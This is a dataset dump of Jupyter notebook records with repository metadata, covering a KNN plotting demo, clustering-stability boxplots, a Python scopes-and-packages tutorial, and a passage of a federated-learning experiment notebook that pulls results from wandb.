hexsha
stringlengths
40
40
size
int64
6
14.9M
ext
stringclasses
1 value
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
6
260
max_stars_repo_name
stringlengths
6
119
max_stars_repo_head_hexsha
stringlengths
40
41
max_stars_repo_licenses
sequence
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
6
260
max_issues_repo_name
stringlengths
6
119
max_issues_repo_head_hexsha
stringlengths
40
41
max_issues_repo_licenses
sequence
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
6
260
max_forks_repo_name
stringlengths
6
119
max_forks_repo_head_hexsha
stringlengths
40
41
max_forks_repo_licenses
sequence
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
avg_line_length
float64
2
1.04M
max_line_length
int64
2
11.2M
alphanum_fraction
float64
0
1
cells
sequence
cell_types
sequence
cell_type_groups
sequence
e72d22b684ede1bf7ee23f2336b9c83f210d2d3d
29,895
ipynb
Jupyter Notebook
KNN_Explanation_Visual.ipynb
mmccown5/QCM_project
b0a5ce59959e45fb6e645e6bd95deb7af267d82e
[ "MIT" ]
1
2021-11-21T18:17:04.000Z
2021-11-21T18:17:04.000Z
KNN_Explanation_Visual.ipynb
mmccown5/QCM_project
b0a5ce59959e45fb6e645e6bd95deb7af267d82e
[ "MIT" ]
null
null
null
KNN_Explanation_Visual.ipynb
mmccown5/QCM_project
b0a5ce59959e45fb6e645e6bd95deb7af267d82e
[ "MIT" ]
null
null
null
103.086207
5,932
0.851079
[ [ [ "## Visual Explanation of KNN\nFor the class presentation, I use the following plots to discuss using k-nearest neighbors to estimate outcome based on a predictor variable. In this case, averages were calculated manually with k=3.\n", "_____no_output_____" ] ], [ [ "import pandas as pd\nfrom matplotlib import pyplot as plt", "_____no_output_____" ] ], [ [ "I load my example data. These are semi-random points I picked to give the plot non-linear data with some trend and grouping.", "_____no_output_____" ] ], [ [ "data = pd.read_csv(\"visual.txt\",sep=\"\\t\")\ndata.head()", "_____no_output_____" ] ], [ [ "Plot the example data with pyplot. Note that the scales are removed, as it doesn't matter for the purpose of the presentation.", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis1.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ] ], [ [ "Now add red points to represent new values of the putative predictor for which the outcome is unknown. The blue points will be used as training dataset while the red are treated as test points. First, I plot the test points at the bottom of the graph. (This was zero, but that changed the y range shown and I didn't like that.)", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\nplt.scatter([2,5.5,9.5], [0,0,0],color='red')\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis2.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ], [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\nplt.scatter([2,5.5,9.5], [2,2,2],color='red')\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis2b.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ] ], [ [ "Next, move the test points to the y value predicted by knn with k of 3. ", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\n\nplt.scatter([2,5.5,9.5], [3.8,8.5,4.7],color='red')\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis3.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ] ], [ [ "The figures are saved as vis1, vis 2, and vis3 and are added to my powerpoint.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72d297eda9898b7669a452849a5ea9526f37157
2,062
ipynb
Jupyter Notebook
python_list.ipynb
Juude/LearnTensorFlow
3f9dc6dd2645af32c1634e263a41e93c452c022b
[ "Apache-2.0" ]
1
2016-11-12T06:28:36.000Z
2016-11-12T06:28:36.000Z
python_list.ipynb
Juude/LearnTensorFlow
3f9dc6dd2645af32c1634e263a41e93c452c022b
[ "Apache-2.0" ]
null
null
null
python_list.ipynb
Juude/LearnTensorFlow
3f9dc6dd2645af32c1634e263a41e93c452c022b
[ "Apache-2.0" ]
1
2020-02-13T05:02:30.000Z
2020-02-13T05:02:30.000Z
16.23622
78
0.465082
[ [ [ "a = [1,3,5]", "_____no_output_____" ], [ "sum(a) / len(a)", "_____no_output_____" ], [ "b = True", "_____no_output_____" ], [ "not b", "_____no_output_____" ], [ "def find_mean(values):\n # TODO: Return the average of the values in the given Python list\n return sum(values) / len(values)", "_____no_output_____" ], [ "print(find_mean([1, 3, 4]))", "2.6666666666666665\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
e72d3ca75c4d3364c112fc3bad0543b1f0e011d6
149,293
ipynb
Jupyter Notebook
notebooks/si-06-variance-impact-of-consensus-clustering.ipynb
QuantLaw/Measuring-Law-Over-Time
3285512b8bbdfdd4e7a4ec5950b451f86d0d8094
[ "CC-BY-4.0" ]
2
2021-06-14T05:43:53.000Z
2021-07-17T20:15:58.000Z
notebooks/si-06-variance-impact-of-consensus-clustering.ipynb
QuantLaw/Measuring-Law-Over-Time
3285512b8bbdfdd4e7a4ec5950b451f86d0d8094
[ "CC-BY-4.0" ]
null
null
null
notebooks/si-06-variance-impact-of-consensus-clustering.ipynb
QuantLaw/Measuring-Law-Over-Time
3285512b8bbdfdd4e7a4ec5950b451f86d0d8094
[ "CC-BY-4.0" ]
1
2021-06-06T21:49:36.000Z
2021-06-06T21:49:36.000Z
654.79386
37,400
0.952543
[ [ [ "# Impact of consensus clustering on stability", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport matplotlib.pylab as plt\nimport seaborn as sns\n", "_____no_output_____" ], [ "sns.set_style(\"whitegrid\")\nplt.rcParams['figure.figsize'] = (8,6)\nplt.rcParams['font.size'] = 20\n", "_____no_output_____" ] ], [ [ "# US", "_____no_output_____" ] ], [ [ "def make_boxplot(dataset, metric, ylabel, save_path=None):\n df = pd.read_pickle(f'../results/variance_impact_of_consensus_clustering_{dataset}.pickle')\n fig, ax = plt.subplots()\n ax.boxplot(\n [\n df.loc[metric,:].loc[i,:]['values'].tolist() \n for i in sorted(df.loc[metric,:].index.unique())\n ], \n notch=0,\n sym=\"\", \n medianprops=dict(color='r')\n )\n ax.set_xticklabels(sorted(df.loc[metric,:].index.unique()))\n plt.ylabel(ylabel)\n plt.xlabel(\"Runs for Consensus Clustering\")\n plt.tight_layout()\n if save_path is not None:\n plt.savefig(save_path)", "_____no_output_____" ], [ "make_boxplot('us_reg', 'NMI', 'Normalized Mutual Information',\n '../graphics/variance_impact_of_consensus_clustering_nmi_us_reg.pdf')", "_____no_output_____" ], [ "make_boxplot('us_reg', 'Rand', 'Adjusted Rand Index', \n '../graphics/variance_impact_of_consensus_clustering_rand_us_reg.pdf')", "_____no_output_____" ] ], [ [ "# DE", "_____no_output_____" ] ], [ [ "make_boxplot('de_reg', 'NMI', 'Normalized Mutual Information',\n '../graphics/variance_impact_of_consensus_clustering_nmi_de_reg.pdf')", "_____no_output_____" ], [ "make_boxplot('de_reg', 'Rand', 'Adjusted Rand Index', \n '../graphics/variance_impact_of_consensus_clustering_rand_de_reg.pdf')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e72d42665f208e6c177230b03c61567745996763
20,320
ipynb
Jupyter Notebook
book/week_07/01-Package-structure.ipynb
fmaussion/scientific_programming
e757ba944f485b3754fbbe27e289ca03741bb6fa
[ "CC-BY-4.0" ]
26
2018-04-24T13:37:33.000Z
2021-11-29T14:04:35.000Z
book/week_07/01-Package-structure.ipynb
fmaussion/scientific_programming
e757ba944f485b3754fbbe27e289ca03741bb6fa
[ "CC-BY-4.0" ]
14
2020-10-07T11:21:20.000Z
2022-03-20T17:39:18.000Z
book/week_07/01-Package-structure.ipynb
fmaussion/scientific_programming
e757ba944f485b3754fbbe27e289ca03741bb6fa
[ "CC-BY-4.0" ]
14
2018-04-03T10:17:42.000Z
2021-11-08T14:33:06.000Z
38.412098
604
0.630709
[ [ [ "# 01 - Structure of a python package", "_____no_output_____" ], [ "*Python Zen: \"Namespaces are one honking great idea - let's do more of those!\"*\n\nWe introduced the concept of python modules in a [previous unit](../week_03/01-Import-Scopes). Today we are going into more details and will introduce Python \"**packages**\", which contain more than one module and are the structure used by all larger Python libraries.", "_____no_output_____" ], [ "## Revision: modules, namespaces and scopes", "_____no_output_____" ], [ "Python [modules](https://docs.python.org/3/tutorial/modules.html) simply are ``*.py`` files. They can contain executable statements as well as function definitions, in any order.\n\nFor example, a module called ``mymodule.py`` could look like:\n\n```python\nimport numpy as np\n\npi = 3.14\nprint('Module top level 1')\n\ndef circle_area(radius):\n \"\"\"A cool function\"\"\"\n print('In function')\n return pi * radius**2\n\nprint('Module top level 2')\n\nif __name__ == '__main__':\n \n print('In main script')\n print('Area of circle: {}'.format(circle_area(10)))\n```", "_____no_output_____" ], [ "```{exercise}\nCan you predict what will be printed on screen if (i) you run ``import mymodule`` in a python interpreter, or (ii) run ``python mymodule.py`` from the command line? If not, try it yourself!\n```", "_____no_output_____" ], [ "The example should be self-explanatory, and we will discuss it in class. If you have any question at this point don't hesitate to ask me! See [this tutorial from RealPython](https://realpython.com/run-python-scripts/) for more details.", "_____no_output_____" ], [ "Continue to read only after the mechanisms happening in the example above are fully understood.\n\n...\n\nOK? Let's go on then.", "_____no_output_____" ], [ "### More on scopes ", "_____no_output_____" ], [ "Here is a more intricate example for ``mymodule.py``:\n\n```python\ndef print_n():\n print('The number N in the function is: {}'.format(N))\n\nN = 10\nprint_n()\n```", "_____no_output_____" ], [ "```{exercise}\nWill ``import mymodule`` run or will it fail with an error? Think about it for a little while, and if you don't know for sure, try it out!\n```\n\n\n...\n\n\n(spoiler protection)\n\n...\n", "_____no_output_____" ], [ "Why is this example working, even if ``N`` is defined below the function definition? Here again, the *order* at which things are happening when the module is imported is the important trick:\n\n1. the function ``print_n`` is detected and interpreted, but *not* executed (nobody called it)\n2. the variable ``N`` is assigned the value ``10``. It is now available at the module scope, i.e. an external module import would allow the command ``from mymodule import N`` to run without error\n3. The function ``print_n`` is called. In this function, the interpreter seeks for a local scope variable (i.e. at the function level) called ``N``. It doesn't find it, and therefore looks at the module level. Nice! A variable called ``N`` is found at the module level and printed.\n\nNote that this will not always work. See the following example which builds upon the previous one:", "_____no_output_____" ] ], [ [ "def print_n():\n print('The number N in the function is: {}'.format(N))\n N += 1\n\nN = 10\nprint_n()", "_____no_output_____" ] ], [ [ "So how is this example different to the one above, which worked fine as explained? We just added a line *below* the one that used to work before. So now there is a variable ``N`` in the function, and it overrides the module-level one. The python interpreter detects that variable and raises an error at execution, independent to whether or not there is a global variable ``N`` available.", "_____no_output_____" ], [ "Even if it might work to define module level variables anywhere, the recommended order of code in a module is:\n1. import statements\n2. module level variable definitions\n3. functions\n4. if necessary (rare): one or more function calls (e.g. to initialize some global values), `__main__`\n\nBut... If module functions can read variables at the module level, can they also change them? Here is another example messing around with **global** and **local** variables:", "_____no_output_____" ] ], [ [ "x = 2\ny = 1\n\ndef func(x):\n x = x + y\n return x\n\nprint(func(3))\nprint(func(x))\nprint(x)\nprint(y)", "_____no_output_____" ] ], [ [ "What can we learn from this example? That the local (function) scope variable ``x`` has nothing to do with the global scope variable ``x``. For the python interpreter, both are unrelated and their name is irrelevant. What is relevant though is which scope they are attached to (if you are interested to know which variables are currently available in your scope, check the built-in functions [dir()](https://docs.python.org/3/library/functions.html#dir), [globals()](https://docs.python.org/3/library/functions.html#globals) and [locals()](https://docs.python.org/3/library/functions.html#locals)).", "_____no_output_____" ], [ "### The ``global`` statement ", "_____no_output_____" ], [ "In special cases, it might be useful for a function to change the value of a global variable. Examples include package level parameter sets such as options and model parameters which will change the behavior of the package after being set. For example, see numpy's [set_printoptions](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.set_printoptions.html) function:", "_____no_output_____" ] ], [ [ "import numpy as np\na = np.array([1.123456789])\nprint(a)\nnp.set_printoptions(precision=4)\nprint(a)", "_____no_output_____" ] ], [ [ "We changed the value of a variable at the module level (we don't know its name but it isn't relevant here) which is now taken into account by the numpy print function.", "_____no_output_____" ], [ "Let's say we'd like to have a counter of the number of times a function has been called. We can do this with the following syntax:", "_____no_output_____" ] ], [ [ "count = 0\n\ndef func():\n global count # without this, count would be local!\n count += 1\n\nfunc()\nfunc()\nprint(count)", "_____no_output_____" ] ], [ [ "Note that in practice, global variables that need updating are rarely single integers or floats like in this example. The reasons for this will be explained later on, once you've learned more about python packages and the import system. ", "_____no_output_____" ], [ "### Are global variables truly \"global\" in python? ", "_____no_output_____" ], [ "If by this question we mean \"global\" as available everywhere in any python script or interpreter, the short answer is **no, there is no such thing as a \"global\" variable in python**. The term \"global variable\" in python always refers to the module level, while \"local variables\" refer to the embedded scope (often, a function). \n\nIf you want to have access to a module's top-level variable (or function), you *have* to import it. This system ensures very clear and unpolluted **namespaces**, where everything can be traced to its source:", "_____no_output_____" ] ], [ [ "import numpy\nimport math\nimport scipy\n\nprint(math.pi, 'from the math module')\nprint(numpy.pi, 'from the numpy package')\nprint(scipy.pi, 'from the scipy package')", "_____no_output_____" ] ], [ [ "The only exception to the import rule are [built-in functions](https://docs.python.org/3/library/functions.html), which are available everywhere and have their own scope. If you want to know more about the four different python scopes, read this [blog post by Sebastian Raschka](http://sebastianraschka.com/Articles/2014_python_scope_and_namespaces.html#scope-resolution-for-variable-names-via-the-legb-rule): A Beginner's Guide to Python's Namespaces, Scope Resolution, and the LEGB Rule.", "_____no_output_____" ], [ "## Packages ", "_____no_output_____" ], [ "*From the [documentation](https://docs.python.org/3/tutorial/modules.html#packages):*\n \nPackages are a way of structuring Python’s module namespace by using \"dotted module names\". For example, the module name ``A.B`` designates a submodule named ``B`` in a package named ``A``. Just like the use of modules saves the authors of different modules from having to worry about each other’s global variable names, the use of dotted module names saves the authors of multi-module packages like NumPy or Xarray from having to worry about each other’s module names. ", "_____no_output_____" ], [ "Packages can also be used to organize bigger projects into thematic groups. SciPy for example has more than 12 subpackages, some of them being organized in sub-subpackages.", "_____no_output_____" ], [ "Now read the few paragraphs from the python documentation on [packages](https://docs.python.org/3/tutorial/modules.html#packages) *(estimated reading time: 5 min)*.", "_____no_output_____" ], [ "You are maybe asking yourself: **what can I use packages for?** Well, for one, it is necessary to understand their basic structure in order to be able to read someone else's code, for example in the ``xarray`` library. Second, because I think that you have everything to win by organizing your personal code (analysis routines, plot functions...) into a single package that you can import from anywhere (e.g. in a Jupyter Notebook or from a different working directory). Therefore, the ClimVis project will bring you to write a small package.", "_____no_output_____" ], [ "### The structure of a package", "_____no_output_____" ], [ "I've written a simple package template called \"scispack\" to help you getting started with your future packages. You will find the code [on github](https://github.com/fmaussion/scispack) and a link to download it (green button in the top right). It is released in the public domain, feel free to use it for your projects. You will have more time to get familiar with it during the assignments (the `climvis` package is based on it). Here, I'll simply repeat its basic structure:\n\n**Directory root (``./``)**\n\n- ``.gitignore``: for git users only\n- ``LICENSE.txt``: [always](https://help.github.com/articles/licensing-a-repository/) \n license your code\n- ``README.md``: this page\n- ``setup.py``: this is what makes your package installable by ``pip``. It contains \n a set of simple instructions regarding e.g. the name of the package, it's version\n number, or where to find command line scripts\n \n**The actual package (``./scispack``)**\n\n- ``__init__.py``: tells python that the directory is a package and enables\n the \"dotted module names\" import syntax. It is often empty, but here\n we added some entry points to the package's API and the version string.\n- ``cfg.py``, ``utils.py`` and ``cli.py``: the modules\n- ``cli.py``: entry point for the command line interface \n- ``cfg.py``: container module for the package parameters and constants\n\n**The tests (``./scispack/tests``)**\n\nOne test file per module. Their name has to start with ``test_`` in order to be \ndetected by pytest.", "_____no_output_____" ], [ "### Installing a local package", "_____no_output_____" ], [ "By starting your python interpreter from the root directory of a package (for example the template package) you will have access to the familiar syntax (e.g. ``from scispack.utils import area_of_circle``). But if you start an interpreter from anywhere else the package won't be available. \n\nRemember what we wrote about the [python sys.path](content:syspath) a couple of weeks ago? In order to \"install\" the package we have two options:\n1. we add the path to the package directory to `sys.path`\n2. we copy the package into a folder already listed in `sys.path`\n\nFrom the two solutions, number 2 is by far the easiest and most sustainable. In fact, this is what happens when you do ``pip install packagename`` or ``conda install packagename``. The two commands are very similar in that they are looking for the package in an online repository, download it and copy it in the current environment's `sys.path`. If you want to know where an installed package is located, you can do:", "_____no_output_____" ] ], [ [ "import numpy\nnumpy.__file__", "_____no_output_____" ] ], [ [ "The same installation options are offered to us for our self-made package. The simplest is to navigate to our package's root directory and run:\n\n $ pip install -e .\n \nThe ``pip install .`` command will look for a ``setup.py`` file **in the current folder** (this is why the dot `.` is used) and if found, use it to determine the package's name and other installation options. The ``-e`` optional argument installs the package in \"editable\" or \"development\" mode. In simple terms, this option will create a [symbolic link](https://en.wikipedia.org/wiki/Symbolic_link) to the package directory instead of copying the files. Therefore, any changes to the code will always be available the next time you open a new python interpreter.\n\n```{tip}\n``pip install -e .`` is the recommended way to install any local package, in pip or in conda environments. At the university (or on computers where you don't have the super-user permissions), use ``pip install --user -e .``\n```", "_____no_output_____" ], [ "### Advanced applications: packaging and sharing code", "_____no_output_____" ], [ "The simple template you are going to start with in `ClimVis` is not fundamentally different from larger packages like xarray or numpy. There are a couple of big differences though, and I'll list some of them here:\n- [rioxarray](https://github.com/corteva/rioxarray) (as a pure python package) has a ``setup.py`` much like yours. It will have some more options related to the version control of the package and will have a separate folder for HTML documentation. The rest of the root directory files are related to testing and continuous integration. \n- [numpy](https://github.com/numpy/numpy) (as a mix of python and C code) will be quite more complex to deploy. Installing a development version of numpy will imply some compilation of C code, which is quite easy to do on linux machines but needs quite some time.\n\nTools like ``pip`` or ``conda`` hide all these things from the users, fortunately. They ship pre-compiled binaries and take care of most of the details in the background. This hasn't always been that easy though, and a recent post by [xkcd](https://xkcd.com/1987/) reminds us that installing python packages can still be a mess sometimes:", "_____no_output_____" ], [ "![img](https://imgs.xkcd.com/comics/python_environment.png)", "_____no_output_____" ], [ "## Take home points", "_____no_output_____" ], [ "- python has very clear rules regarding the scope of variables, leading to clearly defined namespaces\n- there are no \"truely global\" variables in python, only namespaces\n- a package is a way to organize several modules under the same namespace. It allows to construct nested modules, like ``from A.B import C``\n- make your package installable simply requires to comply to a couple of simple rules, including defining a ``setup.py`` installation file at the root directory folder\n- I recommend to install local packages with ``pip install -e .``", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72d44a42db792df826e6118ef372e6a904d93bc
464
ipynb
Jupyter Notebook
nbgrader/tests/preprocessors/files/bad-markdown-cell-1.ipynb
sashabaranov/nbgrader
6d260e9f63cef15073a4540fe34ef196e36c4c94
[ "BSD-3-Clause-Clear" ]
null
null
null
nbgrader/tests/preprocessors/files/bad-markdown-cell-1.ipynb
sashabaranov/nbgrader
6d260e9f63cef15073a4540fe34ef196e36c4c94
[ "BSD-3-Clause-Clear" ]
1
2018-10-31T15:54:37.000Z
2018-10-31T15:54:37.000Z
nbgrader/tests/preprocessors/files/bad-markdown-cell-1.ipynb
zonca/nbgrader
6d260e9f63cef15073a4540fe34ef196e36c4c94
[ "BSD-3-Clause-Clear" ]
null
null
null
14.967742
29
0.491379
[ [ [ "this is a markdown cell", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e72d498ac2b70d15449d707c247f6e9c849a1332
23,129
ipynb
Jupyter Notebook
ipynb/Digits vary budget distribution.ipynb
illidanlab/SplitMix
4297aa01a90101792bfb482fd96a61f51766d97a
[ "MIT" ]
7
2022-03-15T23:27:57.000Z
2022-03-30T06:15:45.000Z
ipynb/Digits vary budget distribution.ipynb
illidanlab/SplitMix
4297aa01a90101792bfb482fd96a61f51766d97a
[ "MIT" ]
null
null
null
ipynb/Digits vary budget distribution.ipynb
illidanlab/SplitMix
4297aa01a90101792bfb482fd96a61f51766d97a
[ "MIT" ]
1
2022-03-22T11:28:36.000Z
2022-03-22T11:28:36.000Z
30.675066
121
0.523672
[ [ [ "The experiment was raised by the ICLR2022 reviewers.\n\nWe aim to evaluate the methods in different experiment settings.", "_____no_output_____" ] ], [ [ "import os, sys\nimport pandas as pd\nimport wandb\nimport numpy as np\nfrom tqdm.notebook import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom IPython.display import display", "_____no_output_____" ], [ "sns.set_style(\"ticks\")\ncmap = sns.color_palette()\nsns.set_palette(sns.color_palette())", "_____no_output_____" ], [ "cache_path = './fig/flops_acc_curve'\nif not os.path.exists(cache_path):\n os.makedirs(cache_path)", "_____no_output_____" ], [ "data = 'Digits'\n\nsweep_dict = {\n 'FedAvg': \"jyhong/SplitMix_release/sweeps/8g8s7kp4\",\n 'SHeteroFL': \"jyhong/SplitMix_release/sweeps/0lh7d73x\",\n 'SHeteroFL vary budgets': \"jyhong/SplitMix_release/sweeps/jbak4jzs\",\n 'HeteroFL ln': \"jyhong/SplitMix_release/sweeps/a36ramy7\",\n 'SplitMix': \"jyhong/SplitMix_release/sweeps/3wr7bsxb\",\n 'SplitMix vary budget': \"jyhong/SplitMix_release/sweeps/8g0irs68\",\n 'SplitMix ln': \"jyhong/SplitMix_release/sweeps/wz10puq8\",\n}", "_____no_output_____" ], [ "agg_df_dict = {}", "_____no_output_____" ], [ "def get_slimmabe_ratios(mode: str):\n ps = mode.split('-')\n slimmable_ratios = []\n for p in ps:\n if 'd' in p:\n p, q = p.split('d') # p: 1/p-net; q: weight of the net in samples\n p, q = int(p), int(q)\n p = p * 1. / q\n else:\n p = int(p)\n slimmable_ratios.append(1. / p)\n# print(f\"Set slim ratios: {self.slimmable_ratios} by mode: {mode}\")\n return slimmable_ratios", "_____no_output_____" ], [ "def fetch_config_summary(runs, config_keys, summary_keys):\n df_dict = defaultdict(list)\n for run in runs:\n if run.state != 'finished':\n print(\"WARN: run not finished yet\")\n history_len = 0\n missing_sum_key = []\n for k in summary_keys:\n if k in run.summary:\n h = run.summary[k]\n df_dict[k].append(h)\n else:\n missing_sum_key.append(k)\n break\n if len(missing_sum_key) > 0:\n print(f\"missing key: {missing_sum_key}\")\n continue\n for k in config_keys:\n df_dict[k].append(run.config[k])\n return df_dict", "_____no_output_____" ] ], [ [ "## FedAvg", "_____no_output_____" ] ], [ [ "mode = 'FedAvg'\napi = wandb.Api()\nsweep = api.sweep(sweep_dict[mode])", "_____no_output_____" ], [ "df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['width_scale'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n)\ndf = pd.DataFrame(df_dict)\ndf['mode'] = mode\ndf['width_scale'] = df['width_scale'] * 100\ndf['width'] = df['width_scale']\ndf['slim_ratios'] = 'w/o constraint'\n\nagg_df_dict[mode] = df # [df['slim_ratio'] == 1.0]", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='width', y='avg test acc', marker='o')\nax.set(xticks=df['width'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ] ], [ [ "## SHeteroFL", "_____no_output_____" ] ], [ [ "mode = 'SHeteroFL'\napi = wandb.Api()\nsweep = api.sweep(sweep_dict[mode])", "_____no_output_____" ], [ "df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n)\ndf = pd.DataFrame(df_dict)\ndf['test_slim_ratio'] = df['test_slim_ratio'] * 100\ndf['width'] = df['test_slim_ratio']\ndf['slim_ratios'] = '8-4-2-1'\n\n# df['mode'] = mode\n# agg_df_dict[mode] = df[df['slim_sch'] == 'group_size']\n\ndf['mode'] = mode\nagg_df_dict[mode] = df\n# agg_df_dict['S'+mode] = df[df['slim_sch'] == 'group_slimmable']", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='test_slim_ratio', y='avg test acc', \n marker='o')\nax.set(xticks=df['test_slim_ratio'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ], [ "mode = 'SHeteroFL vary budgets'\napi = wandb.Api()\nsweep = api.sweep(sweep_dict[mode])\n\ndf_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'slim_ratios'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n)\ndel_idxs = []\nfor idx in range(len(df_dict['slim_ratios'])):\n slim_ratios = get_slimmabe_ratios(df_dict['slim_ratios'][idx])\n # print(df_dict['slim_ratios'][idx], slim_ratios)\n if df_dict['test_slim_ratio'][idx] not in slim_ratios:\n # print(\"del\", idx, df_dict['test_slim_ratio'][idx])\n del_idxs.append(idx)\nfor k in df_dict:\n df_dict[k] = [v for i, v in enumerate(df_dict[k]) if i not in del_idxs]\ndf = pd.DataFrame(df_dict)\ndf['test_slim_ratio'] = df['test_slim_ratio'] * 100\ndf['width'] = df['test_slim_ratio']\n\ndf['mode'] = 'SHeteroFL'\nagg_df_dict[mode] = df # [df['slim_sch'] == 'group_slimmable']", "_____no_output_____" ], [ "sns.lineplot(data=df, x='width', y='avg test acc', hue='slim_ratios', marker='o')\nplt.grid(True)", "_____no_output_____" ] ], [ [ "## Split-Mix", "_____no_output_____" ] ], [ [ "dfs = []\n# for atom_slim_ratio in [0.125, 0.25]:\nfor mode in ['SplitMix']: # , 'SplitMix incr']:\n print(f\"mode: {mode}\")\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'atom_slim_ratio'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n )\n df = pd.DataFrame(df_dict)\n df['mode'] = mode\n df['test_slim_ratio'] = df['test_slim_ratio'] * 100\n df['width'] = df['test_slim_ratio']\n df['slim_ratios'] = '8-4-2-1'\n dfs.append(df)\n agg_df_dict[mode] = df\n \ndf = pd.concat(dfs)", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='test_slim_ratio', y='avg test acc', marker='o')\nax.set(xticks=df['test_slim_ratio'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ], [ "for mode in ['SplitMix vary budget']:\n # 'SplitMix step=0.25 non-exp'\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n print(f\"mode: {mode}\")\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'atom_slim_ratio', 'slim_ratios'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n )\n df = pd.DataFrame(df_dict)\n df['mode'] = 'SplitMix'\n df['test_slim_ratio'] = df['test_slim_ratio'] * 100\n df['width'] = df['test_slim_ratio']\n df = df[df['slim_ratios'] != '8-4-2-1']\n agg_df_dict[mode] = df", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='width', y='avg test acc', marker='o', hue='slim_ratios')\nax.set(xticks=df['test_slim_ratio'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ] ], [ [ "## Aggregation", "_____no_output_____" ] ], [ [ "agg = pd.concat([v for k, v in agg_df_dict.items()])", "_____no_output_____" ], [ "cmap = sns.color_palette(as_cmap=True)\nlen(cmap)", "_____no_output_____" ] ], [ [ "more budget-sufficient 